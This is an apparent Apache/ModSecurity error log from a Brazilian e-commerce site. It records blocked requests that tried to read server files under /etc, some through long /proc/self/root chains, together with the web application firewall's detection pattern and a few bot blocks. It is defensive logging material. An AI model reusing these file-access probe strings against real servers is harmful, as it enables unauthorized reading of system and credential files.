[Fri Mar 20 11:45:34.215162 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.17:43444] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1djjJ3M9BSuKP7CAZYxQAAAJA"]
[Fri Mar 20 11:45:44.207504 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.49:44078] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1dmPHIg5MgXLBnicMlWwAAAcg"]
[Fri Mar 20 11:45:55.419030 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.244.43:33858] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1dozJ3M9BSuKP7CAZY3wAAAJI"]
[Fri Mar 20 11:46:01.578085 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.106:44924] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dqfXLqtnMIWvjpaLMkQAAApQ"]
[Fri Mar 20 11:46:05.079408 2026] [:error] [pid 11167:tid 140411733534464] [client 57.141.18.73:44954] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1drfHIg5MgXLBnicMlcAAAAcE"]
[Fri Mar 20 11:46:37.330758 2026] [mime_magic:error] [pid 11642:tid 140411708356352] (70014)End of file found: [client 57.141.18.77:46586] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:46:41.024295 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.113:46730] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1dzwF0L0L-SsrnPo6ZsAAAAsQ"]
[Fri Mar 20 11:47:01.111336 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.78:47804] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1d5RCii7xarUs8iHabWQAAAgU"]
[Fri Mar 20 11:47:03.196492 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.107:47952] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1d5xCii7xarUs8iHabXQAAAgs"]
[Fri Mar 20 11:47:03.577512 2026] [mime_magic:error] [pid 15826:tid 140411741927168] (70014)End of file found: [client 57.141.18.72:47992] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:47:05.069106 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.101:48084] [client 57.141.18.101] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tcsd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1d6eoXxyEfFpUF8f-wkQAAAU0"]
[Fri Mar 20 11:47:17.951281 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:33954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1d9eoXxyEfFpUF8f-wqAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 11:47:19.999615 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.104:48984] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1d9vXLqtnMIWvjpaLNKQAAAoA"]
[Fri Mar 20 11:47:43.551575 2026] [:error] [pid 10189:tid 140411582465792] [client 57.141.18.77:50000] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1eDzJ3M9BSuKP7CAZZTQAAAJM"]
[Fri Mar 20 11:47:43.673348 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.68:50002] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyslog.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1eDzJ3M9BSuKP7CAZZTgAAAIQ"]
[Fri Mar 20 11:47:43.823493 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.28:50012] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1eDwF0L0L-SsrnPo6Z5QAAAso"]
[Fri Mar 20 11:47:46.206464 2026] [mime_magic:error] [pid 26799:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:50198] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:47:51.167951 2026] [mime_magic:error] [pid 11642:tid 140411741927168] (70014)End of file found: [client 57.141.18.84:50496] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:48:19.591109 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.116:52280] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1eM_HIg5MgXLBnicMmEgAAAcU"]
[Fri Mar 20 11:48:53.443097 2026] [:error] [pid 31215:tid 140411683178240] [client 57.141.18.122:53682] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1eVQF0L0L-SsrnPo6aFwAAAsc"]
[Fri Mar 20 11:48:55.138987 2026] [:error] [pid 11167:tid 140411658000128] [client 57.141.18.13:53802] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1eV_HIg5MgXLBnicMmRQAAAco"]
[Fri Mar 20 11:48:58.488781 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.87:53976] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1eWvqxLDW4GITHUkQb1QAAARI"]
[Fri Mar 20 11:49:23.403560 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.115:55220] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1ec11pVZ5mVmJwsFNfdwAAAEU"]
[Fri Mar 20 11:49:32.446290 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.54:55448] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1efBCii7xarUs8iHab1QAAAhU"]
[Fri Mar 20 11:49:33.226893 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.228.61:52012] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1efTJ3M9BSuKP7CAZaBQAAAJg"]
[Fri Mar 20 11:49:42.731106 2026] [:error] [pid 11642:tid 140411683178240] [client 74.7.243.128:55666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1ehrninkcc-iUj5AqNYAAAA4c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:50:15.325965 2026] [mime_magic:error] [pid 11642:tid 140411725141760] (70014)End of file found: [client 57.141.18.63:57962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:50:34.049802 2026] [mime_magic:error] [pid 7893:tid 140411708356352] (70014)End of file found: [client 57.141.18.51:58768] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:50:38.340808 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.46:58972] [client 57.141.18.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1evuoXxyEfFpUF8f-xVQAAAVE"]
[Fri Mar 20 11:50:44.380176 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.113:59342] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1exF1pVZ5mVmJwsFNfxwAAAFc"]
[Fri Mar 20 11:50:44.573097 2026] [mime_magic:error] [pid 21219:tid 140411565680384] (70014)End of file found: [client 74.7.243.128:53736] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Fri Mar 20 11:50:44.927240 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.51:59380] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1exBCii7xarUs8iHacKQAAAgw"]
[Fri Mar 20 11:50:54.465106 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.62:59946] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1ezjJ3M9BSuKP7CAZaYQAAAIM"]
[Fri Mar 20 11:50:56.679289 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.244.43:49650] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1e0PXLqtnMIWvjpaLOEwAAAoM"]
